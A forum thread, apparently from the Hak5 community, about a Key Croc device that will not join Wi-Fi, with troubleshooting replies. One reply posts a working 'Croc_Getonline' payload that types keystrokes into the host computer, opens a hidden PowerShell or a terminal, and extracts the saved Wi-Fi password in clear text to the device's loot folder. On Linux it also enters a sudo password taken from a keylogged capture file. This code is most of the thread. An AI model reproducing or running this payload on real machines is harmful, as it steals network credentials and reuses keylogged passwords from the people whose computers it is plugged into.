alex7272 Posted September 21, 2022 Share Posted September 21, 2022 Hi guys, I’m having issues connecting the croc to Wi-Fi, I’ve had many other devices before successfully configured so I know what I am doing however I can’t for the life of me connect the croc to Wi-Fi. The things I have tried: 1. read the hak5 documentation (600999 times) 2. Read forums about people with same issue (none on here seemed to resolve it successfully) 3. Upgraded to latest 1.3 firmware 4. factory reset 5. created multiple easier all lowercase networks and passwords to avoid special characters that require escaping 6. ran ps ax and killed the dhclient wlan0 and the other wlan command (as suggested in another hak5 post) and brought them back up to no avail 7. I have checked the wpa supplicant conf file and it is showing the correct information 8. I have saved the config file with notepad++ with line endings set to Unix and also saved as a nano in root directory to make sure no funny line endings 9. tried it on someone else’s complete different network 10. I’ve tested different payloads and they are being executed as expected (except the payloads that grab ip info they show blank lines) 11. downgraded to a 1.2 firmware - didn’t fix it either I’ve spent about 2 days trying to get this working which it literally is a brand new device out of box I’ve watched the hak5 demo videos seems like a very easy device to configure but highly misleading which is a bit of a let down. I rarely ever post on forums like this, only posting cause I am completely out of options and no documentation or forums found have helped as it seems this issue is quite common but no fixes. any assistance would be greatly appreciated!! Thank you!! Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted September 21, 2022 Share Posted September 21, 2022 I guess the networks you have tested weren't all hidden networks, or? If you try to connect to hidden network, you have to add a line to the wpa_supplicant.conf file. Also (but that's pretty obvious), you have to connect to a 2.4 GHz network/AP. Quote Link to comment Share on other sites More sharing options...
alex7272 Posted September 26, 2022 Author Share Posted September 26, 2022 none of the networks i tested were hidden networks, also all networks tested were 2.4 GHz. I am using my home router for this. Does the router need to be in AP mode, its just in router mode (not sure if this makes any difference - grasping at straws now) Quote Link to comment Share on other sites More sharing options...
spywill Posted October 5, 2022 Share Posted October 5, 2022 (edited) Try these payloads and see if they help you to connect to a wifi access point. This payload just edit in your SSID name and password and then add payload to keycroc payload folder reboot keycroc and then type in match word (mywifi) led will turn green keycroc should be connected to wifi access point. May want to delete the config file off your keycroc first just in case its corrupted in some way don't worry the keycroc will generate a new config file on next boot. # Title: WIFI-SETUP # Description: Connect to access point quickly by match word add ssid and passwd # Author: spywill # Version: 1.4 # Category: Key Croc MATCH mywifi SSID_NAME=ADD_SSID_NAME_HERE SSID_PASSWD=ADD_PASSWORD_HERE LED SETUP sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID $SSID_NAME\nWIFI_PASS $SSID_PASSWD\nSSH ENABLE' /root/udisk/config.txt sleep 1 PID_WPA=$(pidof wpa_supplicant) PID_DHC=$(pidof dhclient) ifconfig wlan0 down echo -ne "network={\n\tssid=\"$SSID_NAME\"\n\tpsk=\"$SSID_PASSWD\"\n\tpriority=1\n}" > /etc/wpa_supplicant.conf kill -9 $PID_WPA && kill -9 $PID_DHC sleep 2 ifconfig wlan0 up sleep 2 wpa_supplicant -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf -B && dhclient wlan0 sleep 5 systemctl restart ssh.service sleep 1 if : >/dev/tcp/8.8.8.8/53; then LED FINISH else LED R fi sleep 3 LED OFF This payload just add to keycroc payload folder reboot keycroc and then type in match word getonline_W <-- MATCH word for windows getonline_L <-- MATCH word for Linux getonline_R <-- MATCH word for Raspberry pi then led will turn green keycroc should be connected to wifi access point. # Title: Croc_Getonline # Description: Attempt to connect Keycroc automatically to target wifi access point # Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt # Author: spywill # Version: 3.5 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro MATCH (getonline_W|getonline_R|getonline_L) CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt if [ -f $wifi_pass ]; then cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt rm -f $wifi_pass fi ATTACKMODE HID STORAGE Q DELAY 5000 LED ATTACK case $LOOT in getonline_W) Q GUI r Q DELAY 3000 Q STRING "powershell -NoP -NonI -W Hidden" Q ENTER Q DELAY 5000 Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" Q ENTER Q DELAY 3000 Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" Q ENTER Q DELAY 2000 Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" Q ENTER Q DELAY 2000 Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" Q ENTER Q DELAY 5000 Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" Q ENTER ;; getonline_R) Q CONTROL-ALT-d Q CONTROL-ALT-t Q DELAY 2000 Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" Q ENTER Q DELAY 2000 Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" Q ENTER Q DELAY 2000 Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" Q ENTER Q DELAY 2000 Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" Q ENTER Q DELAY 3000 Q STRING "umount \$MOUNT_POINT ; exit" Q ENTER ;; getonline_L) if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) else PC_PW=LINUX fi Q CONTROL-ALT-d Q ALT-t Q DELAY 2000 Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" Q ENTER Q DELAY 2000 Q STRING "$PC_PW" Q ENTER Q DELAY 2000 Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" Q ENTER Q DELAY 2000 Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" Q ENTER Q DELAY 2000 Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" Q ENTER Q DELAY 3000 Q STRING "sudo umount \$MOUNT_POINT ; exit" Q ENTER ;; esac ATTACKMODE HID sleep 3 LED SETUP kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) ifconfig wlan0 down if [ "$LOOT" = "getonline_W" ]; then sed -i '0,/./s/^.//' $wifi_pass sed -i 's/\r//g' $wifi_pass fi sed -i 's/\( \)*/\1/g' $wifi_pass sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf ifconfig wlan0 up wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 sleep 3 systemctl restart ssh.service [ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R sleep 3 LED OFF Edited March 14 by spywill Quote Link to comment Share on other sites More sharing options...
bhphilos Posted March 12 Share Posted March 12 Hi spywill I^m having the same issues like alex7272. I'v tried your payloads but still no luck! Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 12 Share Posted March 12 Is your PSK containing special characters that you have escaped using \ ? Quote Link to comment Share on other sites More sharing options...
spywill Posted March 14 Share Posted March 14 Sometimes I find myself having a hard time running payloads because of my Numlock stat on my keyboard, for some reason after a reboot of my pc my keyboard Numlock stat will be off and my payloads will fail to execute in this stat it will not quack any numbers, I press the Numlock key to turn it to on stat and then run the payload and then payload execute. i'm not sure if this will fix the issue Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.